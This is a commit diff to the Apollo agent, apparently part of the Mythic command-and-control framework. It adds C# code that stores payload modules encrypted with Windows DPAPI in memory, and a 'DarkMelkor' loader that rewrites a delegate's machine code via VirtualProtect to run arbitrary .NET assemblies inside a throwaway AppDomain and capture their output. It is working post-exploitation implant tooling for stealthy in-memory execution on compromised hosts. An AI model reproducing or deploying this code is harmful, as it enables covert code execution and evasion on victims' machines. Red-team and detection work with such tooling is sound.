Inline Assembly files added

MythicAgents · Dec 29, 2021 · c698ddb · c698ddb
1 parent 5e4983c
commit c698ddb
Show file tree

Hide file tree

Showing 5 changed files with 575 additions and 0 deletions.
diff --git a/Payload_Type/apollo/agent_code/Apollo/Management/Files/DpapiFileManager.cs b/Payload_Type/apollo/agent_code/Apollo/Management/Files/DpapiFileManager.cs
@@ -0,0 +1,151 @@
+using System;
+using System.Text;
+using ApolloInterop.Interfaces;
+using static ApolloInterop.Structs.Win32;
+using static ApolloInterop.Enums.Win32;
+using System.Runtime.InteropServices;
+using ApolloInterop.Classes.Api;
+using AI = ApolloInterop.Classes.Core;
+using EncryptedFileStore.Dpapi;
+
+namespace Apollo.Management.Files
+{
+    public sealed class DpapiFileManager : IDpapiFileManager
+    {
+        public static Byte[] bEntropy = { 0x90, 0x91, 0x92, 0x93 };
+        public static int CRYPTPROTECT_LOCAL_MACHINE = 0x4;
+
+        CryptProtectData _pCryptProtectData;
+        CryptUnprotectData _pCryptUnprotectData;
+        LocalFree _pLocalFree;
+        RtlZeroMemory _pRtlZeroMemory;
+
+        private IAgent _agent;
+        private IEncryptedFileStore<DPAPI_MODULE> _dpapifileStore;
+
+        private delegate bool CryptProtectData(
+            ref DATA_BLOB pPlainText,
+            string szDescription,
+            ref DATA_BLOB pEntropy,
+            IntPtr pReserved,
+            IntPtr pPrompt,
+            int dwFlags,
+            ref DATA_BLOB pCipherText);
+
+        private delegate bool CryptUnprotectData(
+            ref DATA_BLOB pCipherText,
+            ref string pszDescription,
+            ref DATA_BLOB pEntropy,
+            IntPtr pReserved,
+            IntPtr pPrompt,
+            int dwFlags,
+            ref DATA_BLOB pPlainText);
+
+        public delegate IntPtr LocalFree(
+            IntPtr hMem);
+
+        public delegate void RtlZeroMemory(
+            IntPtr Destination,
+            int length);
+
+
+        public DpapiFileManager(IAgent agent)
+        {
+            _agent = agent;
+            _dpapifileStore = new DpapiFileStore(_agent);
+            _pCryptProtectData = agent.GetApi().GetLibraryFunction<CryptProtectData>(Library.CRYPT32, "CryptProtectData");
+            _pCryptUnprotectData = agent.GetApi().GetLibraryFunction<CryptUnprotectData>(Library.CRYPT32, "CryptUnprotectData");
+            _pLocalFree = agent.GetApi().GetLibraryFunction<LocalFree>(Library.KERNEL32, "LocalFree");
+            _pRtlZeroMemory = agent.GetApi().GetLibraryFunction<RtlZeroMemory>(Library.NTDLL, "RtlZeroMemory");
+
+        }
+
+        public DPAPI_MODULE dpapiEncryptModule(Byte[] bMod, String sModName, Int32 iModVersion = 0)
+        {
+
+
+            DPAPI_MODULE dpMod = new DPAPI_MODULE();
+
+            DATA_BLOB oPlainText = makeBlob(bMod);
+            DATA_BLOB oCipherText = new DATA_BLOB();
+            DATA_BLOB oEntropy = makeBlob(bEntropy);
+
+            Boolean bStatus = _pCryptProtectData(ref oPlainText, sModName, ref oEntropy, IntPtr.Zero, IntPtr.Zero, CRYPTPROTECT_LOCAL_MACHINE, ref oCipherText);
+            if (bStatus)
+            {
+                dpMod.sModName = sModName;
+                dpMod.iModVersion = iModVersion;
+                dpMod.iModSize = oCipherText.cbData;
+                dpMod.pMod = oCipherText.pbData;
+            }
+
+            return dpMod;
+        }
+        public DPAPI_MODULE dpapiDecryptModule(DPAPI_MODULE oEncMod)
+        {
+            DPAPI_MODULE oMod = new DPAPI_MODULE();
+
+            Byte[] bEncrypted = new Byte[oEncMod.iModSize];
+            Marshal.Copy(oEncMod.pMod, bEncrypted, 0, oEncMod.iModSize);
+
+            DATA_BLOB oPlainText = new DATA_BLOB();
+            DATA_BLOB oCipherText = makeBlob(bEncrypted);
+            DATA_BLOB oEntropy = makeBlob(bEntropy);
+
+            String sDescription = String.Empty;
+            Boolean bStatus = _pCryptUnprotectData(ref oCipherText, ref sDescription, ref oEntropy, IntPtr.Zero, IntPtr.Zero, 0, ref oPlainText);
+            if (bStatus)
+            {
+                oMod.pMod = oPlainText.pbData;
+                oMod.bMod = new Byte[oPlainText.cbData];
+                Marshal.Copy(oPlainText.pbData, oMod.bMod, 0, oPlainText.cbData);
+                oMod.iModSize = oPlainText.cbData;
+                oMod.iModVersion = oEncMod.iModVersion;
+            }
+
+            return oMod;
+        }
+        public void freeMod(DPAPI_MODULE oMod)
+        {
+            //IntPtr piLen = (IntPtr)oMod.iModSize;
+            //NtFreeVirtualMemory((IntPtr)(-1), ref oMod.pMod, ref piLen, AllocationType.Release);
+            _pLocalFree(oMod.pMod);
+        }
+
+        public DATA_BLOB makeBlob(Byte[] bData)
+        {
+            DATA_BLOB oBlob = new DATA_BLOB();
+
+            oBlob.pbData = Marshal.AllocHGlobal(bData.Length);
+            oBlob.cbData = bData.Length;
+            _pRtlZeroMemory(oBlob.pbData, bData.Length);
+            Marshal.Copy(bData, 0, oBlob.pbData, bData.Length);
+
+            return oBlob;
+        }
+
+        public bool AddFileToStore(string keyName, byte[] data)
+        {
+            DPAPI_MODULE dpMod = dpapiEncryptModule(data, null, 0);
+            return _dpapifileStore.TryAddOrUpdate(keyName, dpMod);
+        }
+
+        public bool GetFileFromStore(string keyName, out DPAPI_MODULE data)
+        {
+            try
+            {
+                _dpapifileStore.TryGetValue(keyName, out data);
+                DPAPI_MODULE oMod = dpapiDecryptModule(data);
+                data = oMod;
+                return true;
+            }
+            catch
+            {
+                data = new DPAPI_MODULE();
+                return false;
+            }
+        }
+
+
+    }
+}
diff --git a/Payload_Type/apollo/agent_code/ApolloInterop/Interfaces/IDpapiFileManager.cs b/Payload_Type/apollo/agent_code/ApolloInterop/Interfaces/IDpapiFileManager.cs
@@ -0,0 +1,25 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using static ApolloInterop.Enums.Win32;
+using static ApolloInterop.Structs.Win32;
+
+namespace ApolloInterop.Interfaces
+{
+    public interface IDpapiFileManager
+    {
+        DPAPI_MODULE dpapiEncryptModule(Byte[] bMod, String sModName, Int32 iModVersion = 0);
+
+        DPAPI_MODULE dpapiDecryptModule(DPAPI_MODULE oEncMod);
+
+        void freeMod(DPAPI_MODULE oMod);
+
+        DATA_BLOB makeBlob(Byte[] bData);
+
+        bool AddFileToStore(string keyName, byte[] data);
+
+        bool GetFileFromStore(string keyName, out DPAPI_MODULE data);
+
+    }
+}
diff --git a/Payload_Type/apollo/agent_code/ApolloInterop/Utils/DarkMelkorUtils.cs b/Payload_Type/apollo/agent_code/ApolloInterop/Utils/DarkMelkorUtils.cs
@@ -0,0 +1,110 @@
+using System;
+using System.IO;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+using ApolloInterop.Classes.Api;
+using ApolloInterop.Interfaces;
+using System.Reflection;
+
+
+
+namespace ApolloInterop.Utils
+{
+    public class DarkMelkorUtils
+    {
+        static VirtualProtect _pVirtualProtect;
+
+        private delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
+
+        public DarkMelkorUtils(IAgent agent)
+        {
+            //_pCryptProtectData = agent.GetApi().GetLibraryFunction<CryptProtectData>(Library.CRYPT32, "CryptProtectData");
+            _pVirtualProtect = agent.GetApi().GetLibraryFunction<VirtualProtect>(Library.CRYPT32, "VirtualProtect");
+
+        }
+        public static string loadAppDomainModule(String[] sParams, Byte[] bMod)
+        {
+            string result = "";
+            var bytes = bMod;
+            AppDomain isolationDomain = AppDomain.CreateDomain(Guid.NewGuid().ToString());
+            isolationDomain.SetData("str", sParams);
+            bool default_domain = AppDomain.CurrentDomain.IsDefaultAppDomain();
+            try
+            {
+                isolationDomain.Load(bMod);
+            }
+            catch { }
+            var Sleeve = new CrossAppDomainDelegate(Console.Beep);
+            var Ace = new CrossAppDomainDelegate(ActivateLoader);
+
+            RuntimeHelpers.PrepareDelegate(Sleeve);
+            RuntimeHelpers.PrepareDelegate(Ace);
+
+            var flags = BindingFlags.Instance | BindingFlags.NonPublic;
+            var codeSleeve = (IntPtr)Sleeve.GetType().GetField("_methodPtrAux", flags).GetValue(Sleeve);
+            var codeAce = (IntPtr)Ace.GetType().GetField("_methodPtrAux", flags).GetValue(Ace);
+
+            int[] patch = new int[3];
+
+            patch[0] = 10;
+            patch[1] = 11;
+            patch[2] = 12;
+
+            uint oldprotect = 0;
+            _pVirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), 0x4, out oldprotect);
+            Marshal.WriteByte(codeSleeve, 0x48);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, 1), 0xb8);
+            Marshal.WriteIntPtr(IntPtr.Add(codeSleeve, 2), codeAce);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[0]), 0xff);
+            Marshal.WriteByte(IntPtr.Add(codeSleeve, patch[1]), 0xe0);
+            _pVirtualProtect(codeSleeve, new UIntPtr((uint)patch[2]), oldprotect, out oldprotect);
+            try
+            {
+                isolationDomain.DoCallBack(Sleeve);
+            }
+            catch (Exception ex)
+            {
+            }
+            string str = isolationDomain.GetData("str") as string;
+            result = str;
+            unloadAppDomain(isolationDomain);
+            return result;
+        }
+
+        static void ActivateLoader()
+        {
+            string[] str = AppDomain.CurrentDomain.GetData("str") as string[];
+            string output = "";
+            foreach (var asm in AppDomain.CurrentDomain.GetAssemblies())
+            {
+                if (!asm.FullName.Contains("mscor"))
+                {
+                    TextWriter realStdOut = Console.Out;
+                    TextWriter realStdErr = Console.Error;
+                    TextWriter stdOutWriter = new StringWriter();
+                    TextWriter stdErrWriter = new StringWriter();
+                    Console.SetOut(stdOutWriter);
+                    Console.SetError(stdErrWriter);
+                    var result = asm.EntryPoint.Invoke(null, new object[] { str });
+
+                    Console.Out.Flush();
+                    Console.Error.Flush();
+                    Console.SetOut(realStdOut);
+                    Console.SetError(realStdErr);
+
+                    output = stdOutWriter.ToString();
+                    output += stdErrWriter.ToString();
+                }
+            }
+            AppDomain.CurrentDomain.SetData("str", output);
+
+        }
+
+        public static void unloadAppDomain(AppDomain oDomain)
+        {
+            AppDomain.Unload(oDomain);
+        }
+
+
+    }
+}
diff --git a/Payload_Type/apollo/agent_code/EncryptedFileStore/DPAPI/DpapiFileStore.cs b/Payload_Type/apollo/agent_code/EncryptedFileStore/DPAPI/DpapiFileStore.cs
@@ -0,0 +1,42 @@
+using ApolloInterop.Interfaces;
+using System;
+using System.Collections.Generic;
+using System.Collections.Concurrent;
+using System.Linq;
+using System.Text;
+using static ApolloInterop.Structs.Win32;
+
+namespace EncryptedFileStore.Dpapi
+{
+    public class DpapiFileStore : DpapiEncryptedFileStore
+    {
+        public DpapiFileStore(IAgent agent) : base(agent)
+        { }
+
+        public override string GetScript()
+        {
+            return Encoding.UTF8.GetString(_currentScript);
+        }
+
+        public override void SetScript(string script)
+        {
+            SetScript(Encoding.UTF8.GetBytes(script));
+        }
+
+        public override void SetScript(byte[] script)
+        {
+            _currentScript = script;
+        }
+
+        public override bool TryAddOrUpdate(string keyName, DPAPI_MODULE data)
+        {
+            return _dpapifileStore.TryAdd(keyName, data);
+        }
+
+        public override bool TryGetValue(string keyName, out DPAPI_MODULE data)
+        {
+
+            return _dpapifileStore.TryGetValue(keyName, out data);
+        }
+    }
+}